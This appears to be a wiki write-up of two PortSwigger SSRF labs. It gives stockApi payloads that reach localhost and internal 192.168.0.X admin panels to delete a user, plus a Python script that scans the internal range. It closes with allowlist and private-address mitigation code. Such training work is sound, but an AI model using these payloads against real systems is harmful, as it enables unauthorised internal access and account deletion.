
Server side request forgery (SSRF)

Alnoman Kamil edited this page Jun 12, 2024 · 25 revisions

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

  • Solution

    1. Browse the site and look for the Check stock functionality on a product.
    2. Intercept the Check stock request.
    3. In the request, set stockApi to http://localhost (URL-encode it with ⌘ U) and forward it.
    4. Notice that the response now contains the admin panel: the /admin endpoint has been accessed.
    5. Attempting to delete carlos reveals /admin/delete?username=carlos.
    6. Intercept Check stock again and set stockApi to http://localhost/admin/delete?username=carlos, delivering an SSRF attack.

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

  • Solution

    1. Create a python virtual environment:
       python3 -m venv .
       source bin/activate
    2. Scan the internal 192.168.0.X range for an admin interface on port 8080 (use the python script below).

    ```python
    import requests

    # Base configuration: lab-specific values. Replace the "uuid" host with
    # your lab's hostname and the session cookie with your own before running.
    url = "https://uuid.web-security-academy.net/product/stock"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "session=7bX4Nrzi0Q27kyqGvWqlQYzqhTc8WB7h",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Accept": "*/*",
        "Origin": "https://uuid.web-security-academy.net",
        "Referer": "https://uuid.web-security-academy.net/product?productId=4",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8"
    }

    # Send one stock check whose stockApi parameter points the server at a
    # candidate internal host; a 200 means the back end reached /admin there.
    def scan_ip(ip):
        data = f"stockApi=http://{ip}:8080/admin"
        # verify=False skips TLS certificate checks; drop it unless you are
        # deliberately routing the request through an intercepting proxy.
        response = requests.post(url, headers=headers, data=data, verify=False)
        if response.status_code == 200:
            print(f"Connected to admin interface at {ip}:8080")
            print("--------------------------------------------------------------------------------------")
        else:
            print(f"No admin interface at {ip}:8080")

    # Main scanning loop over the whole 192.168.0.X range
    if __name__ == "__main__":
        for i in range(1, 255):
            ip_address = f"192.168.0.{i}"
            scan_ip(ip_address)
    ```

    3. Intercept the Check stock functionality and change stockApi to the internal IP address with the /admin endpoint.
    4. Observe the endpoint for deleting users.
    5. Set stockApi to http://192.168.0.82:8080/admin/delete?username=carlos, URL-encoded.
    6. (Optional) Deactivate the python virtual environment:
       deactivate
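
The mitigation side of both labs above, as an added example that is not part of this wiki or of the PortSwigger labs: a stock checker should only fetch from an allow-list of upstream targets, so stockApi values such as http://localhost/admin or http://192.168.0.82:8080/admin/delete?username=carlos are rejected before any request is made, and its HTTP client should additionally refuse resolved addresses in loopback, private (192.168.0.0/16) or link-local ranges. The hostname stock.example-internal.test and the ALLOWED_UPSTREAMS tuple are hypothetical.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allowlist: the only (scheme, host, port) tuples the stock
# checker is ever meant to fetch. A real deployment lists its actual upstream.
ALLOWED_UPSTREAMS = {("https", "stock.example-internal.test", 443)}


def is_allowed_stock_url(url: str) -> bool:
    """Accept a stockApi value only if it targets an allow-listed upstream.

    An allowlist beats a denylist here: the lab payloads (http://localhost/admin,
    http://192.168.0.82:8080/admin/...) fail simply because they are not listed,
    and so does any other host, IP literal, scheme or port an attacker tries.
    """
    try:
        parts = urlsplit(url)
        host = parts.hostname   # lower-cased, IPv6 brackets stripped
        port = parts.port       # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not host:
        return False
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    return (parts.scheme, host, port) in ALLOWED_UPSTREAMS


def address_is_routable(ip_text: str) -> bool:
    """Second layer for the HTTP client: after resolving the allow-listed
    hostname, refuse to connect to any address that is loopback, private
    (RFC 1918, e.g. 192.168.0.0/16), link-local (169.254.0.0/16, where cloud
    metadata endpoints live), multicast, reserved or unspecified.
    The client must connect to the address it checked rather than resolving
    again, otherwise a rebinding DNS answer can swap in an internal address.
    """
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)
```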
    